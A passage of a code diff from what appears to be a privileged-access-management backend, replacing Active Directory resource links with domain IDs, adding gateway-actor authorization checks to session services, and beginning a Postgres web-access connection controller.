(adServerResourceId: string, tx?: Knex) => { + const findByDomainId = async (domainId: string, tx?: Knex) => { try { const resources = await (tx || db.replicaNode())(TableName.PamResource) .select(selectAllTableCols(TableName.PamResource)) - .where(`${TableName.PamResource}.adServerResourceId`, adServerResourceId) + .where(`${TableName.PamResource}.domainId`, domainId) .orderBy(`${TableName.PamResource}.name`, "asc"); return resources; } catch (error) { - throw new DatabaseError({ error, name: "Find PAM resources by AD server resource ID" }); + throw new DatabaseError({ error, name: "Find PAM resources by domain ID" }); } }; @@ -177,7 +177,7 @@ export const pamResourceDALFactory = (db: TDbClient) => { findById, findByProjectId, findMetadataByResourceIds, - findByAdServerResourceId, + findByDomainId, findByGatewayId, countByGatewayId }; diff --git a/backend/src/ee/services/pam-resource/pam-resource-enums.ts b/backend/src/ee/services/pam-resource/pam-resource-enums.ts index bb7476b62e8..6fdeb10fb3d 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-enums.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-enums.ts @@ -7,8 +7,7 @@ export enum PamResource { AwsIam = "aws-iam", Redis = "redis", MongoDB = "mongodb", - Windows = "windows", - ActiveDirectory = "active-directory" + Windows = "windows" } export enum PamResourceOrderBy { diff --git a/backend/src/ee/services/pam-resource/pam-resource-factory.ts b/backend/src/ee/services/pam-resource/pam-resource-factory.ts index 06f9020431c..6cbbbc23aca 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-factory.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-factory.ts @@ -1,4 +1,3 @@ -import { activeDirectoryResourceFactory } from "./active-directory/active-directory-resource-factory"; import { awsIamResourceFactory } from "./aws-iam/aws-iam-resource-factory"; import { kubernetesResourceFactory } from "./kubernetes/kubernetes-resource-factory"; import { mongodbResourceFactory } from "./mongodb/mongodb-resource-factory"; @@ -29,6 +28,5 @@ export const PAM_RESOURCE_FACTORY_MAP: Record { getRedisResourceListItem(), getMongoDBResourceListItem(), getWindowsResourceListItem(), - getActiveDirectoryResourceListItem(), getSshResourceListItem() ].sort((a, b) => a.name.localeCompare(b.name)); }; @@ -122,9 +120,15 @@ export const decryptResource = async ( projectId: string, kmsService: Pick ) => { - let sessionSummaryConfig: { aiInsightsEnabled: boolean; connectionId: string; model: string } | null = null; + const { + encryptedConnectionDetails, + encryptedRotationAccountCredentials, + encryptedResourceMetadata, + encryptedSessionSummaryConfig, + ...rest + } = resource; - const { encryptedSessionSummaryConfig } = resource; + let sessionSummaryConfig: { aiInsightsEnabled: boolean; connectionId: string; model: string } | null = null; if (encryptedSessionSummaryConfig) { try { @@ -146,15 +150,15 @@ export const decryptResource = async ( } return { - ...resource, + ...rest, connectionDetails: await decryptResourceConnectionDetails({ - encryptedConnectionDetails: resource.encryptedConnectionDetails, + encryptedConnectionDetails, projectId, kmsService }), - rotationAccountCredentials: resource.encryptedRotationAccountCredentials + rotationAccountCredentials: encryptedRotationAccountCredentials ? await decryptAccountCredentials({ - encryptedCredentials: resource.encryptedRotationAccountCredentials, + encryptedCredentials: encryptedRotationAccountCredentials, projectId, kmsService }) diff --git a/backend/src/ee/services/pam-resource/pam-resource-schemas.ts b/backend/src/ee/services/pam-resource/pam-resource-schemas.ts index f41d0b75996..0af9b9ef2c7 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-schemas.ts @@ -1,6 +1,8 @@ import { z } from "zod"; -import { PamAccountsSchema, PamResourcesSchema, ResourceMetadataSchema } from "@app/db/schemas"; +import { PamAccountsSchema, PamDomainsSchema, PamResourcesSchema, ResourceMetadataSchema } from "@app/db/schemas"; +import { PamDomainType } from "@app/ee/services/pam-domain/pam-domain-enums"; +import { PamResource } from "@app/ee/services/pam-resource/pam-resource-enums"; import { slugSchema } from "@app/server/lib/schemas"; import { ResourceMetadataNonEncryptionSchema } from "@app/services/resource-metadata/resource-metadata-schema"; @@ -36,6 +38,7 @@ export const SessionSummaryConfigSchema = z export const BasePamResourceSchema = PamResourcesSchema.omit({ encryptedConnectionDetails: true, encryptedRotationAccountCredentials: true, + encryptedResourceMetadata: true, encryptedSessionSummaryConfig: true, resourceType: true }).extend({ @@ -75,16 +78,22 @@ export const BasePamAccountSchema = PamAccountsSchema.omit({ }); export const BasePamAccountSchemaWithResource = BasePamAccountSchema.extend({ + parentType: z.union([z.nativeEnum(PamResource), z.nativeEnum(PamDomainType)]), resource: PamResourcesSchema.pick({ id: true, name: true, resourceType: true - }).extend({ - rotationCredentialsConfigured: z.boolean() - }), + }) + .extend({ + rotationCredentialsConfigured: z.boolean() + }) + .nullable() + .optional(), + domain: PamDomainsSchema.pick({ id: true, name: true, domainType: true }).nullable().optional(), policyName: z.string().nullable().optional(), lastRotationMessage: z.string().nullable().optional(), - rotationStatus: z.string().nullable().optional() + rotationStatus: z.string().nullable().optional(), + requireReason: z.boolean().default(false) }); export const BaseCreatePamAccountSchema = z.object({ diff --git a/backend/src/ee/services/pam-resource/pam-resource-service.ts b/backend/src/ee/services/pam-resource/pam-resource-service.ts index ed040baf2c4..ba43eb33e8a 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-service.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-service.ts @@ -25,6 +25,7 @@ import { TGatewayV2ServiceFactory } from "../gateway-v2/gateway-v2-service"; import { TPamAccountDALFactory } from "../pam-account/pam-account-dal"; import { PamAccountView } from "../pam-account/pam-account-enums"; import { decryptAccountCredentials, encryptAccountCredentials } from "../pam-account/pam-account-fns"; +import { TPamDomainDALFactory } from "../pam-domain/pam-domain-dal"; import { TPamResourceDALFactory } from "./pam-resource-dal"; import { PamResource } from "./pam-resource-enums"; import { PAM_RESOURCE_FACTORY_MAP } from "./pam-resource-factory"; @@ -39,7 +40,6 @@ import { } from "./pam-resource-fns"; import { TCreateResourceDTO, TListResourcesDTO, TUpdateResourceDTO } from "./pam-resource-types"; import { TSSHResourceInternalMetadata } from "./ssh/ssh-resource-types"; -import { TWindowsResource } from "./windows-server/windows-server-resource-types"; // Extend this set as more LLM providers are added (e.g. AppConnection.OpenAI) const LLM_APP_CONNECTIONS = new Set([AppConnection.Anthropic]); @@ -50,7 +50,8 @@ const AI_SUMMARY_SUPPORTED_RESOURCE_TYPES = new Set([PamResource.Po type TPamResourceServiceFactoryDep = { pamResourceDAL: TPamResourceDALFactory; pamResourceFavoriteDAL: TPamResourceFavoriteDALFactory; - pamAccountDAL: Pick; + pamDomainDAL: Pick; + pamAccountDAL: Pick; permissionService: Pick; kmsService: Pick; gatewayV2Service: Pick< @@ -66,6 +67,7 @@ export type TPamResourceServiceFactory = ReturnType { + const assertDomainInProject = async (domainId: string, projectId: string) => { + const domain = await pamDomainDAL.findById(domainId); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${domainId}' not found` }); + if (domain.projectId !== projectId) { + throw new BadRequestError({ message: "Domain must belong to the same project as the resource" }); + } + }; + const getById = async (id: string, resourceType: PamResource, actor: OrgServiceActor) => { const resource = await pamResourceDAL.findById(id); if (!resource) throw new NotFoundError({ message: `Resource with ID '${id}' not found` }); @@ -101,7 +111,7 @@ export const pamResourceServiceFactory = ({ if (!canReadResources) { // Check if user can read at least one account in this resource - const { accounts } = await pamAccountDAL.findByProjectIdWithResourceDetails({ + const { accounts } = await pamAccountDAL.findByProjectIdWithParentDetails({ projectId: resource.projectId, accountView: PamAccountView.Flat, filterResourceIds: [id] @@ -154,7 +164,7 @@ export const pamResourceServiceFactory = ({ name, projectId, rotationAccountCredentials, - adServerResourceId, + domainId, metadata }: TCreateResourceDTO, actor: OrgServiceActor @@ -177,6 +187,10 @@ export const pamResourceServiceFactory = ({ }) ); + if (domainId) { + await assertDomainInProject(domainId, projectId); + } + const factory = PAM_RESOURCE_FACTORY_MAP[resourceType]( resourceType, connectionDetails, @@ -192,15 +206,6 @@ export const pamResourceServiceFactory = ({ kmsService }); - if (adServerResourceId) { - const adResource = await pamResourceDAL.findById(adServerResourceId); - if (!adResource) - throw new NotFoundError({ message: `AD Server resource with ID '${adServerResourceId}' not found` }); - if (adResource.projectId !== projectId) { - throw new BadRequestError({ message: "AD Server resource must belong to the same project" }); - } - } - let encryptedRotationAccountCredentials: Buffer | null = null; if (rotationAccountCredentials) { @@ -223,7 +228,7 @@ export const pamResourceServiceFactory = ({ name, projectId, encryptedRotationAccountCredentials, - adServerResourceId: adServerResourceId ?? null + domainId: domainId ?? null }, tx ); @@ -263,7 +268,7 @@ export const pamResourceServiceFactory = ({ name, rotationAccountCredentials, gatewayId, - adServerResourceId, + domainId, metadata, sessionSummaryConfig }: TUpdateResourceDTO, @@ -319,16 +324,11 @@ export const pamResourceServiceFactory = ({ updateDoc.name = name; } - if (adServerResourceId !== undefined) { - if (adServerResourceId) { - const adResource = await pamResourceDAL.findById(adServerResourceId); - if (!adResource) - throw new NotFoundError({ message: `AD Server resource with ID '${adServerResourceId}' not found` }); - if (adResource.projectId !== resource.projectId) { - throw new BadRequestError({ message: "AD Server resource must belong to the same project" }); - } + if (domainId !== undefined) { + if (domainId) { + await assertDomainInProject(domainId, resource.projectId); } - updateDoc.adServerResourceId = adServerResourceId; + updateDoc.domainId = domainId; } if (connectionDetails !== undefined) { @@ -647,7 +647,7 @@ export const pamResourceServiceFactory = ({ } // Fetch all accounts for the project (flat view, no pagination) for permission checking - const { accounts: allAccounts } = await pamAccountDAL.findByProjectIdWithResourceDetails({ + const { accounts: allAccounts } = await pamAccountDAL.findByProjectIdWithParentDetails({ projectId, accountView: PamAccountView.Flat }); @@ -666,9 +666,12 @@ export const pamResourceServiceFactory = ({ Array<{ accountName: string; metadata: Array<{ id: string; key: string; value: string }> }> >(); for (const account of allAccounts) { - const existing = accountsByResourceId.get(account.resourceId) || []; - existing.push({ accountName: account.name, metadata: accountMetadata[account.id] || [] }); - accountsByResourceId.set(account.resourceId, existing); + if (account.resourceId) { + // Skip domain accounts for resource-level permission check + const existing = accountsByResourceId.get(account.resourceId) || []; + existing.push({ accountName: account.name, metadata: accountMetadata[account.id] || [] }); + accountsByResourceId.set(account.resourceId, existing); + } } // Filter to only resources where the user can read at least one account @@ -784,41 +787,6 @@ export const pamResourceServiceFactory = ({ return { caPublicKey }; }; - const listRelatedResources = async (adServerResourceId: string, actor: OrgServiceActor) => { - const resource = await pamResourceDAL.findById(adServerResourceId); - if (!resource) throw new NotFoundError({ message: `Resource with ID '${adServerResourceId}' not found` }); - - if (resource.resourceType !== PamResource.ActiveDirectory) { - throw new BadRequestError({ message: "Related resources can only be listed for Active Directory resources" }); - } - - const { permission } = await permissionService.getProjectPermission({ - actor: actor.type, - actorAuthMethod: actor.authMethod, - actorId: actor.id, - actorOrgId: actor.orgId, - projectId: resource.projectId, - actionProjectType: ActionProjectType.PAM - }); - - const metadataByResourceId = await pamResourceDAL.findMetadataByResourceIds([adServerResourceId]); - - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionActions.Read, - subject(ProjectPermissionSub.PamResources, { - name: resource.name, - resourceType: resource.resourceType, - metadata: metadataByResourceId[adServerResourceId] || [] - }) - ); - - const relatedResources = await pamResourceDAL.findByAdServerResourceId(adServerResourceId); - - return Promise.all( - relatedResources.map((r) => decryptResource(r, resource.projectId, kmsService) as Promise) - ); - }; - const setUserResourceFavorite = async ({ projectId, resourceId, @@ -875,7 +843,6 @@ export const pamResourceServiceFactory = ({ list, listResourceOptions, getOrCreateSshCa, - listRelatedResources, setUserResourceFavorite }; }; diff --git a/backend/src/ee/services/pam-resource/pam-resource-types.ts b/backend/src/ee/services/pam-resource/pam-resource-types.ts index 2298c4ab3d7..02f3bbfbd86 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-types.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-types.ts @@ -8,12 +8,6 @@ import { ResourceMetadataNonEncryptionSchema } from "@app/services/resource-meta import { TGatewayV2ServiceFactory } from "../gateway-v2/gateway-v2-service"; import { TPamAccountDependenciesDALFactory } from "../pam-discovery/pam-account-dependencies-dal"; -import { - TActiveDirectoryAccount, - TActiveDirectoryAccountCredentials, - TActiveDirectoryResource, - TActiveDirectoryResourceConnectionDetails -} from "./active-directory/active-directory-resource-types"; import { TAwsIamAccount, TAwsIamAccountCredentials, @@ -83,8 +77,7 @@ export type TPamResource = | TKubernetesResource | TRedisResource | TMongoDBResource - | TWindowsResource - | TActiveDirectoryResource; + | TWindowsResource; export type TPamResourceWithFavorite = TPamResources & { isFavorite: boolean }; export type TPamResourceConnectionDetails = | TPostgresResourceConnectionDetails @@ -95,8 +88,7 @@ export type TPamResourceConnectionDetails = | TAwsIamResourceConnectionDetails | TRedisResourceConnectionDetails | TMongoDBResourceConnectionDetails - | TWindowsResourceConnectionDetails - | TActiveDirectoryResourceConnectionDetails; + | TWindowsResourceConnectionDetails; export type TPamResourceInternalMetadata = TSSHResourceInternalMetadata | TWindowsResourceInternalMetadata; // Account types @@ -109,8 +101,7 @@ export type TPamAccount = | TKubernetesAccount | TRedisAccount | TMongoDBAccount - | TWindowsAccount - | TActiveDirectoryAccount; + | TWindowsAccount; export type TPamAccountCredentials = | TPostgresAccountCredentials @@ -121,14 +112,13 @@ export type TPamAccountCredentials = | TAwsIamAccountCredentials | TRedisAccountCredentials | TMongoDBAccountCredentials - | TWindowsAccountCredentials - | TActiveDirectoryAccountCredentials; + | TWindowsAccountCredentials; // Resource DTOs export type TCreateResourceDTO = Pick & { gatewayId?: string | null; rotationAccountCredentials?: TPamAccountCredentials | null; - adServerResourceId?: string | null; + domainId?: string | null; metadata?: z.input; }; diff --git a/backend/src/ee/services/pam-resource/postgres/postgres-resource-schemas.ts b/backend/src/ee/services/pam-resource/postgres/postgres-resource-schemas.ts index 554a414c9a3..4d6e3c945c8 100644 --- a/backend/src/ee/services/pam-resource/postgres/postgres-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/postgres/postgres-resource-schemas.ts @@ -64,7 +64,7 @@ export const UpdatePostgresAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedPostgresAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.Postgres), + parentType: z.literal(PamResource.Postgres), credentials: PostgresAccountCredentialsSchema.pick({ username: true }) diff --git a/backend/src/ee/services/pam-resource/redis/redis-resource-schemas.ts b/backend/src/ee/services/pam-resource/redis/redis-resource-schemas.ts index 99c578e730a..2070498612b 100644 --- a/backend/src/ee/services/pam-resource/redis/redis-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/redis/redis-resource-schemas.ts @@ -83,7 +83,7 @@ export const UpdateRedisAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedRedisAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.Redis), + parentType: z.literal(PamResource.Redis), credentials: RedisAccountCredentialsSchema.pick({ username: true }) diff --git a/backend/src/ee/services/pam-resource/ssh/ssh-resource-schemas.ts b/backend/src/ee/services/pam-resource/ssh/ssh-resource-schemas.ts index fa06bfb3534..61866cfbb6e 100644 --- a/backend/src/ee/services/pam-resource/ssh/ssh-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/ssh/ssh-resource-schemas.ts @@ -100,6 +100,11 @@ export const SSHResourceInternalMetadataSchema = z.object({ caKeyAlgorithm: z.string() }); +export const SanitizedSSHResourceInternalMetadataSchema = SSHResourceInternalMetadataSchema.pick({ + caPublicKey: true, + caKeyAlgorithm: true +}); + // Accounts export const SSHAccountSchema = BasePamAccountSchema.extend({ credentials: SSHAccountCredentialsSchema @@ -114,7 +119,7 @@ export const UpdateSSHAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedSSHAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.SSH), + parentType: z.literal(PamResource.SSH), credentials: z.discriminatedUnion("authMethod", [ z.object({ authMethod: z.literal(SSHAuthMethod.Password), diff --git a/backend/src/ee/services/pam-resource/windows-server/windows-server-resource-schemas.ts b/backend/src/ee/services/pam-resource/windows-server/windows-server-resource-schemas.ts index 29385e2f613..76da493dc0f 100644 --- a/backend/src/ee/services/pam-resource/windows-server/windows-server-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/windows-server/windows-server-resource-schemas.ts @@ -64,6 +64,11 @@ export const WindowsResourceInternalMetadataSchema = z.object({ osVersionDetail: z.string().optional() }); +export const SanitizedWindowsResourceInternalMetadataSchema = WindowsResourceInternalMetadataSchema.pick({ + osVersion: true, + osVersionDetail: true +}); + export const WindowsResourceSchema = BaseWindowsResourceSchema.extend({ connectionDetails: WindowsResourceConnectionDetailsSchema, rotationAccountCredentials: WindowsAccountCredentialsSchema.nullable().optional() @@ -82,13 +87,13 @@ export const SanitizedWindowsResourceSchema = BaseWindowsResourceSchema.extend({ export const CreateWindowsResourceSchema = BaseCreateGatewayPamResourceSchema.extend({ connectionDetails: WindowsResourceConnectionDetailsSchema, rotationAccountCredentials: WindowsAccountCredentialsSchema.nullable().optional(), - adServerResourceId: z.string().uuid().nullable().optional() + domainId: z.string().uuid().nullable().optional() }); export const UpdateWindowsResourceSchema = BaseUpdateGatewayPamResourceSchema.extend({ connectionDetails: WindowsResourceConnectionDetailsSchema.optional(), rotationAccountCredentials: WindowsAccountCredentialsSchema.nullable().optional(), - adServerResourceId: z.string().uuid().nullable().optional() + domainId: z.string().uuid().nullable().optional() }); // Accounts @@ -108,7 +113,7 @@ export const UpdateWindowsAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedWindowsAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.Windows), + parentType: z.literal(PamResource.Windows), credentials: z.object({ username: z.string() }), diff --git a/backend/src/ee/services/pam-session/pam-session-dal.ts b/backend/src/ee/services/pam-session/pam-session-dal.ts index 7da9305522c..693f62a8c2b 100644 --- a/backend/src/ee/services/pam-session/pam-session-dal.ts +++ b/backend/src/ee/services/pam-session/pam-session-dal.ts @@ -58,6 +58,7 @@ export const pamSessionDALFactory = (db: TDbClient) => { .leftJoin(TableName.GatewayV2, `${TableName.PamResource}.gatewayId`, `${TableName.GatewayV2}.id`) .select(selectAllTableCols(TableName.PamSession)) .select(db.ref("identityId").withSchema(TableName.GatewayV2).as("gatewayIdentityId")) + .select(db.ref("id").withSchema(TableName.GatewayV2).as("gatewayId")) .where(`${TableName.PamSession}.projectId`, projectId); return sessions; diff --git a/backend/src/ee/services/pam-session/pam-session-schemas.ts b/backend/src/ee/services/pam-session/pam-session-schemas.ts index 8174aafb7a1..c2e397494f5 100644 --- a/backend/src/ee/services/pam-session/pam-session-schemas.ts +++ b/backend/src/ee/services/pam-session/pam-session-schemas.ts @@ -60,6 +60,7 @@ export const SanitizedSessionSchema = PamSessionsSchema.omit({ }).extend({ logs: z.array(z.union([PamSessionCommandLogSchema, HttpEventSchema, TerminalEventSchema])), gatewayIdentityId: z.string().nullable().optional(), + gatewayId: z.string().nullable().optional(), aiInsights: AiInsightsSchema }); diff --git a/backend/src/ee/services/pam-session/pam-session-service.ts b/backend/src/ee/services/pam-session/pam-session-service.ts index a5920313e6e..8c5e72fd860 100644 --- a/backend/src/ee/services/pam-session/pam-session-service.ts +++ b/backend/src/ee/services/pam-session/pam-session-service.ts @@ -7,6 +7,8 @@ import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/ import { GatewayProxyProtocol } from "@app/lib/gateway/types"; import { createGatewayConnection, createRelayConnection } from "@app/lib/gateway-v2/gateway-v2"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { OrgServiceActor } from "@app/lib/types"; import { ActorType } from "@app/services/auth/auth-type"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; @@ -57,13 +59,14 @@ export const pamSessionServiceFactory = ({ status: string; expiresAt: Date | null; gatewayIdentityId?: string | null; + gatewayId?: string | null; projectId?: string | null; } >( session: T ): Promise => { // Skip gateway-based sessions - they have their own lifecycle managed by the gateway - if (session.gatewayIdentityId) { + if (session.gatewayIdentityId || session.gatewayId) { return session; } @@ -142,8 +145,8 @@ export const pamSessionServiceFactory = ({ }; const updateLogsById = async ({ sessionId, logs }: TUpdateSessionLogsDTO, actor: OrgServiceActor) => { - // To be hit by gateways only - if (actor.type !== ActorType.IDENTITY) { + // To be hit by gateways only (identity-based or enrollment-flow) + if (actor.type !== ActorType.IDENTITY && actor.type !== ActorType.GATEWAY) { throw new ForbiddenRequestError({ message: "Only gateways can perform this action" }); } @@ -154,25 +157,37 @@ export const pamSessionServiceFactory = ({ throw new BadRequestError({ message: "Cannot update logs for sessions with existing logs" }); } - const project = await projectDAL.findById(session.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(session.projectId), () => + projectDAL.findById(session.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${session.projectId}' not found` }); - const { permission } = await permissionService.getOrgPermission({ - actor: actor.type, - actorId: actor.id, - orgId: project.orgId, - actorAuthMethod: actor.authMethod, - actorOrgId: actor.orgId, - scope: OrganizationActionScope.Any - }); + if (actor.type === ActorType.IDENTITY) { + const { permission } = await permissionService.getOrgPermission({ + actor: actor.type, + actorId: actor.id, + orgId: project.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + scope: OrganizationActionScope.Any + }); - ForbiddenError.from(permission).throwUnlessCan( - OrgPermissionGatewayActions.CreateGateways, - OrgPermissionSubjects.Gateway - ); + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.CreateGateways, + OrgPermissionSubjects.Gateway + ); + } else if (actor.type === ActorType.GATEWAY) { + if (project.orgId !== actor.orgId) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to this session" }); + } + } - if (session.gatewayIdentityId && session.gatewayIdentityId !== actor.id) { - throw new ForbiddenRequestError({ message: "Identity does not have access to update logs for this session" }); + const authorized = + actor.type === ActorType.GATEWAY + ? !session.gatewayId || session.gatewayId === actor.id + : !session.gatewayIdentityId || session.gatewayIdentityId === actor.id; + if (!authorized) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to update logs for this session" }); } const { encryptor } = await kmsService.createCipherPairWithDataKey({ @@ -188,26 +203,28 @@ export const pamSessionServiceFactory = ({ encryptedLogsBlob: cipherTextBlob }); - return { session: updatedSession, projectId: project.id }; + return { session: updatedSession, projectId: session.projectId }; }; const endSessionById = async (sessionId: string, actor: OrgServiceActor) => { const session = await pamSessionDAL.findById(sessionId); if (!session) throw new NotFoundError({ message: `Session with ID '${sessionId}' not found` }); - const project = await projectDAL.findById(session.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(session.projectId), () => + projectDAL.findById(session.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${session.projectId}' not found` }); - const { permission } = await permissionService.getOrgPermission({ - actor: actor.type, - actorId: actor.id, - orgId: project.orgId, - actorAuthMethod: actor.authMethod, - actorOrgId: actor.orgId, - scope: OrganizationActionScope.Any - }); - if (actor.type === ActorType.IDENTITY) { + const { permission } = await permissionService.getOrgPermission({ + actor: actor.type, + actorId: actor.id, + orgId: project.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + scope: OrganizationActionScope.Any + }); + ForbiddenError.from(permission).throwUnlessCan( OrgPermissionGatewayActions.CreateGateways, OrgPermissionSubjects.Gateway @@ -216,12 +233,19 @@ export const pamSessionServiceFactory = ({ if (session.gatewayIdentityId && session.gatewayIdentityId !== actor.id) { throw new ForbiddenRequestError({ message: "Identity does not have access to end this session" }); } + } else if (actor.type === ActorType.GATEWAY) { + if (project.orgId !== actor.orgId) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to this session" }); + } + if (session.gatewayId && session.gatewayId !== actor.id) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to end this session" }); + } } else if (actor.type === ActorType.USER) { if (session.userId !== actor.id) { throw new ForbiddenRequestError({ message: "You are not authorized to end this session" }); } } else { - throw new ForbiddenRequestError({ message: "Only identities and users can perform this action" }); + throw new ForbiddenRequestError({ message: "Only gateways and users can perform this action" }); } const updatedSession = await pamSessionDAL.endSessionById(sessionId); @@ -229,28 +253,25 @@ export const pamSessionServiceFactory = ({ if (session.status !== PamSessionStatus.Ended && session.status !== PamSessionStatus.Terminated) { throw new BadRequestError({ message: "Cannot end sessions that are not active or starting" }); } - return { session, projectId: project.id, alreadyEnded: true }; + return { session, projectId: session.projectId, alreadyEnded: true }; } // Fire-and-forget AI summarization void (async () => { try { - await pamSessionAiSummaryService.queueAiSummary(sessionId, project.id); + await pamSessionAiSummaryService.queueAiSummary(sessionId, session.projectId); } catch (err) { logger.error({ sessionId, err }, `Failed to queue AI summary for ended session [sessionId=${sessionId}]`); } })(); - return { session: updatedSession, projectId: project.id, alreadyEnded: false }; + return { session: updatedSession, projectId: session.projectId, alreadyEnded: false }; }; const terminateSessionById = async (sessionId: string, actor: OrgServiceActor) => { const session = await pamSessionDAL.findById(sessionId); if (!session) throw new NotFoundError({ message: `Session with ID '${sessionId}' not found` }); - const project = await projectDAL.findById(session.projectId); - if (!project) throw new NotFoundError({ message: `Project with ID '${session.projectId}' not found` }); - const { permission } = await permissionService.getProjectPermission({ actor: actor.type, actorAuthMethod: actor.authMethod, @@ -265,16 +286,18 @@ export const pamSessionServiceFactory = ({ ProjectPermissionSub.PamSessions ); + // No project lookup needed: getProjectPermission above throws NotFoundError if the + // project doesn't exist, and session.projectId === project.id by definition. // Atomic update: only transitions active/starting β†’ terminated const updatedSession = await pamSessionDAL.terminateSessionById(sessionId); if (!updatedSession) { - return { session, projectId: project.id, alreadyEnded: true }; + return { session, projectId: session.projectId, alreadyEnded: true }; } // Fire-and-forget AI summarization void (async () => { try { - await pamSessionAiSummaryService.queueAiSummary(sessionId, project.id); + await pamSessionAiSummaryService.queueAiSummary(sessionId, session.projectId); } catch (err) { logger.error({ sessionId, err }, `Failed to queue AI summary for terminated session [sessionId=${sessionId}]`); } @@ -326,7 +349,7 @@ export const pamSessionServiceFactory = ({ })(); } - return { session: updatedSession, projectId: project.id, alreadyEnded: false }; + return { session: updatedSession, projectId: session.projectId, alreadyEnded: false }; }; const getSessionLogs = async (sessionId: string, offset: number, limit: number, actor: OrgServiceActor) => { @@ -375,32 +398,45 @@ export const pamSessionServiceFactory = ({ }; const uploadEventBatch = async ({ sessionId, startOffset, events }: TUploadEventBatchDTO, actor: OrgServiceActor) => { - if (actor.type !== ActorType.IDENTITY) { + // To be hit by gateways only (identity-based or enrollment-flow) + if (actor.type !== ActorType.IDENTITY && actor.type !== ActorType.GATEWAY) { throw new ForbiddenRequestError({ message: "Only gateways can perform this action" }); } const session = await pamSessionDAL.findById(sessionId); if (!session) throw new NotFoundError({ message: `Session with ID '${sessionId}' not found` }); - const project = await projectDAL.findById(session.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(session.projectId), () => + projectDAL.findById(session.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${session.projectId}' not found` }); - const { permission } = await permissionService.getOrgPermission({ - actor: actor.type, - actorId: actor.id, - orgId: project.orgId, - actorAuthMethod: actor.authMethod, - actorOrgId: actor.orgId, - scope: OrganizationActionScope.Any - }); + if (actor.type === ActorType.IDENTITY) { + const { permission } = await permissionService.getOrgPermission({ + actor: actor.type, + actorId: actor.id, + orgId: project.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + scope: OrganizationActionScope.Any + }); - ForbiddenError.from(permission).throwUnlessCan( - OrgPermissionGatewayActions.CreateGateways, - OrgPermissionSubjects.Gateway - ); + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.CreateGateways, + OrgPermissionSubjects.Gateway + ); + } else if (actor.type === ActorType.GATEWAY) { + if (project.orgId !== actor.orgId) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to this session" }); + } + } - if (session.gatewayIdentityId && session.gatewayIdentityId !== actor.id) { - throw new ForbiddenRequestError({ message: "Identity does not have access to upload events for this session" }); + const authorized = + actor.type === ActorType.GATEWAY + ? !session.gatewayId || session.gatewayId === actor.id + : !session.gatewayIdentityId || session.gatewayIdentityId === actor.id; + if (!authorized) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to upload events for this session" }); } const { encryptor } = await kmsService.createCipherPairWithDataKey({ @@ -412,7 +448,7 @@ export const pamSessionServiceFactory = ({ const { wasInserted } = await pamSessionEventBatchDAL.upsertBatch(sessionId, startOffset, cipherTextBlob); - return { projectId: project.id, wasInserted }; + return { projectId: session.projectId, wasInserted }; }; return { getById, list, getSessionLogs, updateLogsById, endSessionById, terminateSessionById, uploadEventBatch }; diff --git a/backend/src/ee/services/pam-web-access/pam-postgres-connection-controller.ts b/backend/src/ee/services/pam-web-access/pam-postgres-connection-controller.ts new file mode 100644 index 00000000000..88f3ce9c343 --- /dev/null +++ b/backend/src/ee/services/pam-web-access/pam-postgres-connection-controller.ts @@ -0,0 +1,309 @@ +import { parse as parseSql } from "libpg-query"; +import pg from "pg"; +import Cursor from "pg-cursor"; + +import { logger } from "@app/lib/logger"; + +import { getTableDetailQuery } from "./pam-postgres-data-explorer-metadata"; +import { + PostgresClientMessageType, + PostgresServerMessageType, + type TPostgresClientMessage, + type TPostgresCorrelatedServerMessage +} from "./pam-postgres-ws-types"; + +type ControllerParams = { + relayPort: number; + username: string; + database: string; + sessionId: string; + connectionId: string; + sendResponse: (msg: TPostgresCorrelatedServerMessage) => void; + onUnexpectedTermination: (reason: string) => void; +}; + +// Tab-scoped messages the controller handles. Metadata (get-schemas, get-tables) +// and lifecycle messages are handled at the multiplexer layer. +type TTabScopedMessage = Extract< + 